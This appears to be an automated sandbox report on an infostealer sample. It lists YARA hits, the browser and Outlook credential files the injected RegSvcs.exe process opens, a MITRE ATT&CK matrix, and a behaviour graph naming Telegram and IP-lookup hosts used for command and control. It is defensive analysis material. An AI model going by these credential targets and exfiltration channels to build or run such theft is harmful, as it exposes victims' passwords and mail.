              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4400, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTR
              Source: Yara matchFile source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3307267063.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Glagolitic.exeBinary or memory string: WIN_XP
              Source: Glagolitic.exe, 00000005.00000002.987621063.0000000000401000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
              Source: Glagolitic.exeBinary or memory string: WIN_XPe
              Source: Glagolitic.exeBinary or memory string: WIN_VISTA
              Source: Glagolitic.exeBinary or memory string: WIN_7
              Source: Glagolitic.exeBinary or memory string: WIN_8
              Source: Yara matchFile source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3307267063.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4400, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3307267063.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4400, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTR
              Source: Yara matchFile source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3307267063.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTR
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_004652BE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00476619
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,2_2_0046CEF3
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,5_2_004652BE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00476619
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,5_2_0046CEF3
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting
              2
              Valid Accounts
              2
              Native API
              111
              Scripting
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              21
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              4
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts
              2
              Valid Accounts
              32
              Obfuscated Files or Information
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron2
              Registry Run Keys / Startup Folder
              21
              Access Token Manipulation
              11
              Software Packing
              NTDS117
              System Information Discovery
              Distributed Component Object Model21
              Input Capture
              1
              Non-Standard Port
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
              Process Injection
              1
              DLL Side-Loading
              LSA Secrets221
              Security Software Discovery
              SSH3
              Clipboard Data
              4
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
              Registry Run Keys / Startup Folder
              1
              Masquerading
              Cached Domain Credentials11
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture25
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Valid Accounts
              DCSync2
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Virtualization/Sandbox Evasion
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
              Process Injection
              Network Sniffing1
              System Network Configuration Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631785 Sample: mKRflLn5sx.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 3 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 9 other signatures 2->52 8 mKRflLn5sx.exe 3 2->8         started        11 wscript.exe 1 2->11         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\...behaviorgraphlagolitic.exe, PE32 8->26 dropped 14 Glagolitic.exe 1 8->14         started        58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->58 18 Glagolitic.exe 11->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...behaviorgraphlagolitic.vbs, data 14->28 dropped 60 Antivirus detection for dropped file 14->60 62 Multi AV Scanner detection for dropped file 14->62 64 Drops VBS files to the startup folder 14->64 66 Switches to a custom stack to bypass stack traces 14->66 20 RegSvcs.exe 15 2 14->20         started        68 Writes to foreign memory regions 18->68 70 Maps a DLL or memory area into another process 18->70 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 49710, 49725 TELEGRAMRU United Kingdom 20->36 38 checkip.dyndns.com 193.122.6.168, 49682, 49685, 49687 ORACLE-BMC-31898US United States 20->38 40 2 other IPs or domains 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.